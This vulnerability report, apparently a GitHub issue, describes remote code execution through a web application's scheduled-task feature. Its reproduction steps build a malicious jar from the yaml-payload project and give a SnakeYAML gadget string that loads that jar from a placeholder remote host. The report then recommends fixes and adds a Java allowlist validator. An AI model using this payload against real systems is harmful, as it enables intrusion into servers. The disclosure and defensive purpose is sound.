1. Steps to reproduce
Using the project https://github.com/artsploit/yaml-payload, modify AwesomeScriptEngineFactory.java as follows:

Build and package it, then move yaml-payload.jar into the root directory of the web service:
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
When using the Scheduled Tasks feature, the call string always contains symbols such as brackets and quotes. However, the XSSFilter in the program converts these symbols to other characters, which makes the Scheduled Tasks feature completely unusable. So we need to whitelist the routes related to scheduled tasks in the XSSFilter configuration in application.yml.

A new scheduled task is created as follows:

The 调用目标字符串 (call target string) field is org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')
Execute this task after submission to remotely execute arbitrary code.
2. Expected behavior
The com.aurora.util.JobInvokeUtil#invokeMethod method reflectively executes the specified method of the given class.

3. Actual behavior
However, this method does not filter the incoming class names and method names, so dangerous class names and method names can be passed in and executed.
4. Affected Version
v2
5. Fix Recommendations
- Filter dangerous class names
- Filter unnecessary protocols such as http, rmi, etc.
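As an added illustration of the two recommendations above (not the project's own code; class names, the invoke-target shape and the list of protocols are assumptions), a validator that rejects an invoke target unless its class is on an explicit allowlist and its arguments carry no protocol prefix, applied before anything reaches reflective execution:

```java
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical validator for the scheduled-task invoke target string.
public class InvokeTargetValidator {
    // Only classes that are meant to be scheduled may be invoked (placeholder names).
    private static final Set<String> ALLOWED_CLASSES = Set.of(
        "com.example.task.ReportTask",
        "com.example.task.CleanupTask");

    // Protocol prefixes that have no business inside a job parameter (assumed list).
    private static final Pattern FORBIDDEN_PROTOCOL =
        Pattern.compile("(?i)\\b(https?|ftp|rmi|ldap|jndi|file)\\s*:");

    // Expected shape: fully.qualified.Class.method(args)
    private static final Pattern TARGET = Pattern.compile(
        "^([A-Za-z_$][\\w$]*(?:\\.[A-Za-z_$][\\w$]*)*)\\.([A-Za-z_$][\\w$]*)\\((.*)\\)$",
        Pattern.DOTALL);

    // Throws IllegalArgumentException for anything that must not be invoked.
    public static void validate(String invokeTarget) {
        Matcher m = TARGET.matcher(invokeTarget.trim());
        if (!m.matches()) {
            throw new IllegalArgumentException("malformed invoke target");
        }
        String className = m.group(1);
        String args = m.group(3);
        if (!ALLOWED_CLASSES.contains(className)) {
            throw new IllegalArgumentException("class not allowlisted: " + className);
        }
        if (FORBIDDEN_PROTOCOL.matcher(args).find()) {
            throw new IllegalArgumentException("forbidden protocol in arguments");
        }
    }

    public static void main(String[] unused) {
        validate("com.example.task.ReportTask.run('daily')"); // accepted
        try {
            // The Yaml.load target from the report is rejected by the class allowlist
            // before its arguments are even inspected.
            validate("org.yaml.snakeyaml.Yaml.load('...')");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist check is the one that matters: a denylist of "dangerous" class names can always be bypassed by a gadget class nobody listed, so the protocol filter should only be a second layer behind it.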